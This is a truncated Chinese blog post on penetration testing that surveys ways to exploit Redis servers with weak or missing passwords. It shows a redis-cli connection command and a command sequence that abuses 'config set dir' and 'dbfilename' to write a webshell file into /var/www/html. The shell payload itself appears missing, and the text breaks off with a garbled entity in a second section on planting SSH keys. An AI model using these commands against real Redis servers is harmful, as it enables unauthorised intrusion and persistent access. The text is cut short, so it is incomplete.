渗透测试:Redis漏洞利用方式大全

渗透测试:Redis漏洞利用方式大全,第1张

Redis被公司大量应用,成为了攻击者最喜欢的猎物之一,大量的木马病毒也广泛利用redis漏洞在内网疯狂传播,对内网扫描、控制、感染、挖矿、勒索等行为和事件层出不穷。然而Redis的利用方式你真的全部了解吗?

你的redis安全吗?设置密码了吗?密码是否太弱?

当redis口令过弱,或者使用了一些频率过高的密码(被密码字典收录),甚至没有设置密码,这个时候你的redis很可能已经被非法用户恶意访问。

redis-cli.exe -h 192.168.86.145

info

只查看redis数据库的部分信息显然不是攻击者的目标,他们想要的是通过redis控制这台主机,再通过这台服务器在内网漫游,控制更多的主机,最后拿到核心数据库。

1.利用redis写入webshell

利用redis直接写入webshell,需要绝对路径,并且需要写入权限。

config set dir /var/www/html/
set x "\n\n\n\n\n\n"
set xx "\n\n\n\n\n\n"
config set dbfilename shell.php
save
2.写入ssh公钥文件使用私钥登录

(1&#x

欢迎分享,转载请注明来源:内存溢出

原文地址: http://outofmemory.cn/langs/874008.html

(0)
打赏 微信扫一扫 微信扫一扫 支付宝扫一扫 支付宝扫一扫
上一篇 2022-05-13
下一篇 2022-05-13

发表评论

登录后才能评论

评论列表(0条)

保存